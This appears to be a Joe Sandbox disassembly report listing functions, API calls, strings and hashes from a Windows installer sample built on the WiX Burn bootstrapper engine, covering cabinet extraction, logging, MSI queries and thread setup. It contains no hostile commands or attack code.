API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: a75cb75d38d9aef4658c638331f09a8e5f3bfa6366bf37e8774d46bd1b9a74f9
Instruction ID: 881e5f9ddc5fb59bb0b032cf31e8971e75ba8ee6e0ba99f4083413336d67c5cd
Opcode Fuzzy Hash: a75cb75d38d9aef4658c638331f09a8e5f3bfa6366bf37e8774d46bd1b9a74f9
Instruction Fuzzy Hash: D541EB36180201ABEB209F598D5DE9B7FA5FBC4B21F218919FD24DB291E732D841DB60

Function 00552AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00513838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00513877
Part of subcall function 00513838: GetLastError.KERNEL32 ref: 00513881

Part of subcall function 00554A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00554A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00552B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00552B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00552B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00552BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00552BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00552BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00552C01

Strings

Msi.dll, xrefs: 00552B09
MsiGetPatchInfoExW, xrefs: 00552B96
MsiDetermineApplicablePatchesW, xrefs: 00552B56
MsiGetProductInfoExW, xrefs: 00552BB6
MsiSourceListAddSourceExW, xrefs: 00552BF6
MsiDeterminePatchSequenceW, xrefs: 00552B36
MsiSetExternalUIRecord, xrefs: 00552BD6
MsiEnumProductsExW, xrefs: 00552B76

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: abb63fdbabcd24bdbb11b03492d03e58f5d86c46b41f742525d3ce5526af22f0
Instruction ID: 1a40e247b53c3d55352f2dfa845d85ca67cd448433e7e24b1a0f4798878a8bb6
Opcode Fuzzy Hash: abb63fdbabcd24bdbb11b03492d03e58f5d86c46b41f742525d3ce5526af22f0
Instruction Fuzzy Hash: AD31B1B0941609EFFB11AF60FD1AB6A7FA0F725759F10412AEA0C5A170E7B1088DBF54

Function 0055304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153
libraryloadercomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00553609,00000000,?,00000000), ref: 00553069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0053C025,?,00515405,?,00000000,?), ref: 00553075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 005530B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005530C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 005530CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005530D6
CoCreateInstance.OLE32(0057B6B8,00000000,00000001,0055B818,?,?,?,?,?,?,?,?,?,?,?,0053C025), ref: 00553111
ExitProcess.KERNEL32 ref: 005531C0

Strings

Wow64RevertWow64FsRedirection, xrefs: 005530CE
Wow64EnableWow64FsRedirection, xrefs: 005530C3
xmlutil.cpp, xrefs: 00553099
kernel32.dll, xrefs: 00553059
Wow64DisableWow64FsRedirection, xrefs: 005530BB
IsWow64Process, xrefs: 005530AF

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: 9331a386c0f9ae5c7c963a16fcf034e43ca3dc220c4815515888685c247ab6ba
Instruction ID: 52cad84bb03e536444960d941e66d83d0f5b63064ed40dee555ef379f6fea262
Opcode Fuzzy Hash: 9331a386c0f9ae5c7c963a16fcf034e43ca3dc220c4815515888685c247ab6ba
Instruction Fuzzy Hash: 4541F831A01715ABDB208BA88869B6EBFB4FF44792F11406AED09E7250D771DF48D790

Function 00531741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0051C3EB,?,00000000,?,0051C47F), ref: 00531778
GetLastError.KERNEL32(?,0051C3EB,?,00000000,?,0051C47F,00515405,?,?,00515445,00515445,00000000,?,00000000), ref: 00531781

Strings

Failed to create begin operation event., xrefs: 005317AF
Failed to wait for operation complete., xrefs: 00531854
cabextract.cpp, xrefs: 005317A5, 005317EB, 00531837
wininet.dll, xrefs: 00531757
Failed to create extraction thread., xrefs: 00531841
Failed to copy file name., xrefs: 00531763
Failed to create operation complete event., xrefs: 005317F5

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: 64a226e961842184cf02bbecb3580e693753ba29a6a364deca2fa900a5a31047
Instruction ID: 6051f716344c166ba1887762bf69280d1b417343292afb5eefc71403c2e65d68
Opcode Fuzzy Hash: 64a226e961842184cf02bbecb3580e693753ba29a6a364deca2fa900a5a31047
Instruction Fuzzy Hash: 5F21A476941B3676E32116B54C59A6BBF5CFB00BA0F120626BE00BB581EA50DC0095E9

Function 0054FCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0054FCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 0054FCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0054FD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0054FD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0054FD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0054FD8B

Strings

CryptUnprotectMemory, xrefs: 0054FD6C
cryputil.cpp, xrefs: 0054FD60
CryptProtectMemory, xrefs: 0054FD20
SystemFunction041, xrefs: 0054FCD8
AdvApi32.dll, xrefs: 0054FCB5
Crypt32.dll, xrefs: 0054FD0C
SystemFunction040, xrefs: 0054FCCB

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: 6732fa1f8b8708afd884eeec4683d71837104a1ea0a13e4d2c1bff48b3e0dea3
Instruction ID: d7010d31926b74f15d26d1d1db0db71d7825c647c2c4948966791454425d239a
Opcode Fuzzy Hash: 6732fa1f8b8708afd884eeec4683d71837104a1ea0a13e4d2c1bff48b3e0dea3
Instruction Fuzzy Hash: 05217F32D41632ABE7315B69BD4D7966D90BB20B59F164131EC08AB1A0F7718C84FBE0

Function 005308C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 005308F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0053090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0053090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00530912
GetLastError.KERNEL32(?,?), ref: 0053091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0053098B
GetLastError.KERNEL32(?,?), ref: 00530998

Strings

cabextract.cpp, xrefs: 00530940, 005309BC
Failed to add virtual file pointer for cab container., xrefs: 00530971
Failed to duplicate handle to cab container., xrefs: 0053094A
Failed to open cabinet file: %hs, xrefs: 005309C9
<the>.cab, xrefs: 005308EB

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 7fc24bd49d616cf6e9b30e2a8722dce752213c1d2fb8025cba44c1170dd14473
Instruction ID: 981580484bbe8cd774ce11ff57c502062e1565cba33856ab22fb0a2f08db64a7
Opcode Fuzzy Hash: 7fc24bd49d616cf6e9b30e2a8722dce752213c1d2fb8025cba44c1170dd14473
Instruction Fuzzy Hash: 9C31AE37941736BBEB215B958C69FAABF68FF04B61F110111FE04B7291D720AD00DAE1

Function 00523F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00523AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00523FB5,feclient.dll,?,00000000,?,?,?,00514B12), ref: 00523B42

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00514B12,?,?,0055B488,?,00000001,00000000,00000000), ref: 0052404C

Strings

feclient.dll, xrefs: 00523FAF, 0052405C
Failed to get non-session specific TEMP folder., xrefs: 005240F6
Failed to open log: %ls, xrefs: 005240C8
crypt32.dll, xrefs: 00523FF2, 00524057, 0052405F, 005240C6, 00524100, 00524141, 00524160, 0052419E, 005241C8
Setup, xrefs: 00523FF9
clbcatq.dll, xrefs: 00524185
msasn1.dll, xrefs: 00524162, 005241A3
Failed to copy log extension to extension., xrefs: 00524191
Failed to copy full log path to prefix., xrefs: 005241AF
Failed to get current directory., xrefs: 0052402E
log, xrefs: 00523FF3
Failed to copy log path to prefix., xrefs: 0052416E

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: a8712540093df3fa301cd9ad4c8c9d4b970ed09176d8dcb4af1096a1a4de3a3c
Instruction ID: e1ce45f5b2150104d92b3b3facdaf6773b8135fe455b69be82cca877403a2247
Opcode Fuzzy Hash: a8712540093df3fa301cd9ad4c8c9d4b970ed09176d8dcb4af1096a1a4de3a3c
Instruction Fuzzy Hash: 7A619071A00636ABDB259F64EC4AA7A7FA8FF52340F044565FD01DB1C0E7B0EDA0DA91

Function 00516DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,00515445,00000006,?,005182B9,?,?,?,00000000,00000000,00000001), ref: 00516DC8

Part of subcall function 005156A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00516595,00516595,?,0051563D,?,?,00000000), ref: 005156E5
Part of subcall function 005156A9: GetLastError.KERNEL32(?,0051563D,?,?,00000000,?,?,00516595,?,00517F02,?,?,?,?,?), ref: 00515714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,005182B9), ref: 00516F59

Strings

Failed to insert variable '%ls'., xrefs: 00516E0D
variable.cpp, xrefs: 00516E4B
Failed to set value of variable: %ls, xrefs: 00516F41
Attempt to set built-in variable value: %ls, xrefs: 00516E56
Setting hidden variable '%ls', xrefs: 00516E86
Setting string variable '%ls' to value '%ls', xrefs: 00516EED
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00516F6B
Failed to find variable value '%ls'., xrefs: 00516DE3
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00516ED0
Setting numeric variable '%ls' to value %lld, xrefs: 00516EFA
Unsetting variable '%ls', xrefs: 00516F15

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: d8e019c630d45bf444bf0200c75c98bf754796accdcc50db89f19021ba896dba
Instruction ID: 888d484faba167a8649af0d1efcd50d983c8178409ae35b08f4cfb43633de795
Opcode Fuzzy Hash: d8e019c630d45bf444bf0200c75c98bf754796accdcc50db89f19021ba896dba
Instruction Fuzzy Hash: 2751C471A40226ABEB309E55DC5AFAB3FB8FB95715F10061AFC0456281C371DDC6CAE1

Function 00514AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00514C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00514C75

Strings

Failed while running , xrefs: 00514C2A
WixBundleLayoutDirectory, xrefs: 00514BF5
Failed to set layout directory variable to value provided from command-line., xrefs: 00514C06
Failed to check global conditions, xrefs: 00514B49
Failed to set action variables., xrefs: 00514BC4
Failed to set registration variables., xrefs: 00514BDE
Failed to query registration., xrefs: 00514BAE
Failed to open log., xrefs: 00514B18
Failed to create the message window., xrefs: 00514B98

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: 1c7fe5cc8371c2b1f0f732af78786dd77e94ec3f00db70016519db66300f63e5
Instruction ID: 276246a5f3226559f815c33fe68995dc033fe2ad39fc4eb3c6ffec66d791fa73
Opcode Fuzzy Hash: 1c7fe5cc8371c2b1f0f732af78786dd77e94ec3f00db70016519db66300f63e5
Instruction Fuzzy Hash: 0841C43160562BBBFB265A20CC59FFABE6CFF01755F005616B804A7190EB60ED94AED0

Function 00512DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00512E5F
GetLastError.KERNEL32 ref: 00512E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00512F09
CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00512F96
GetLastError.KERNEL32 ref: 00512FA3
Sleep.KERNEL32(00000064), ref: 00512FB7
CloseHandle.KERNEL32(?), ref: 0051301F

Strings

%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00512F66
pathutil.cpp, xrefs: 00512E8D
4#v, xrefs: 00512E5F

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4#v$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-1777530710
Opcode ID: 73c2af55f267f74520c6bb785de10ee24bfd8f1e2b9590a19b5abde49e9f21bb
Instruction ID: 0fcb4431b7097a7ba14348de95f761f294bcacb769d8016b5d2d8538fa39ab42
Opcode Fuzzy Hash: 73c2af55f267f74520c6bb785de10ee24bfd8f1e2b9590a19b5abde49e9f21bb
Instruction Fuzzy Hash: 6A716272D41229ABEB309FA4DC5DBEABBB8BB08711F010295F904A7190D7349ED5DF50

Function 0052EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0051548E,?,?), ref: 0052EA9D
GetLastError.KERNEL32(?,0051548E,?,?), ref: 0052EAAA
CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 0052EB03
GetLastError.KERNEL32(?,0051548E,?,?), ref: 0052EB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0051548E,?,?), ref: 0052EB4B
CloseHandle.KERNEL32(00000000,?,0051548E,?,?), ref: 0052EB6A
CloseHandle.KERNELBASE(?,?,0051548E,?,?), ref: 0052EB77

Strings

Failed to create the UI thread., xrefs: 0052EB3B
Failed to create initialization event., xrefs: 0052EAD5
uithread.cpp, xrefs: 0052EACB, 0052EB31

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 367261580b9b2187dcc3b2b26b15e26a1be1b961aa2c9beea0ae40ccf299dbd0
Instruction ID: 4189c2c73f2978c493d648f348028bd8e7c42555996066ff1667189ef1c4e32f
Opcode Fuzzy Hash: 367261580b9b2187dcc3b2b26b15e26a1be1b961aa2c9beea0ae40ccf299dbd0
Instruction Fuzzy Hash: DD31B576D01229BBEB10DF999D8AA9FBEBCFF05351F110165F905F7280E7309E0096A1

Function 005314E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,76232F60,?,?,00515405,005153BD,00000000,00515445), ref: 00531506
GetLastError.KERNEL32 ref: 00531519
GetExitCodeThread.KERNELBASE(0055B488,?), ref: 0053155B
GetLastError.KERNEL32 ref: 00531569
ResetEvent.KERNEL32(0055B460), ref: 005315A4
GetLastError.KERNEL32 ref: 005315AE

Strings

Failed to reset operation complete event., xrefs: 005315DF
cabextract.cpp, xrefs: 00531540, 00531590, 005315D5
Failed to get extraction thread exit code., xrefs: 0053159A
Failed to wait for operation complete event., xrefs: 0053154A

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: cc7af61b5d611ea07a7f5e11435274aebd318bec8eb29282d47557d6ad0d3937
Instruction ID: 8e82a4421c014fdf07558a52761cb9437ee1ac2bb4204c27ea8b12552bb91fc5
Opcode Fuzzy Hash: cc7af61b5d611ea07a7f5e11435274aebd318bec8eb29282d47557d6ad0d3937
Instruction Fuzzy Hash: AA31B671A00705EBE7109FB58D19AAE7FF8FB44701F10415AF906E7160E730DA00AF65

Function 0051CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,005153BD,00000000,00515489,00515445,WixBundleUILevel,840F01E8,?,00000001), ref: 0051CC1C

Strings

payload.cpp, xrefs: 0051CD1D
Failed to concat file paths., xrefs: 0051CCFC
Failed to ensure directory exists, xrefs: 0051CCEE
Payload was not found in container: %ls, xrefs: 0051CD29
Failed to get directory portion of local file path, xrefs: 0051CCF5
Failed to find embedded payload: %ls, xrefs: 0051CC48
Failed to get next stream., xrefs: 0051CD03
Failed to extract file., xrefs: 0051CCE7

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: ee5746517e75a7fa1ceb4bea4ba857a852cabe6043137ae20f49724b9319bd98
Instruction ID: 1d86a323066aca3106177b994673bfbedd4599f278b8bf01c836f2969fbcd1af
Opcode Fuzzy Hash: ee5746517e75a7fa1ceb4bea4ba857a852cabe6043137ae20f49724b9319bd98
Instruction Fuzzy Hash: 6A41FF31980215EBEF259F48CC969EEBFB5BF40711F10816AEC14AB251D3329DC0DB90

Function 00514796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 005147BB
GetCurrentThreadId.KERNEL32 ref: 005147C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0051484F

Strings

Unexpected return value from message pump., xrefs: 005148A5
wininet.dll, xrefs: 005147EE
Failed to start bootstrapper application., xrefs: 0051481D
user.cpp, xrefs: 0051489B
Failed to load UX., xrefs: 00514804
Failed to create user for UX., xrefs: 005147DB

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: 6de02e575873403505e75a57c772ecdc72f25b45a1b488dbb0269db8d1920d5d
Instruction ID: 7dcd23b01866c2e9a648984ffb5e6f4a2b781d6765dacdc5f9784313ccabcbf4
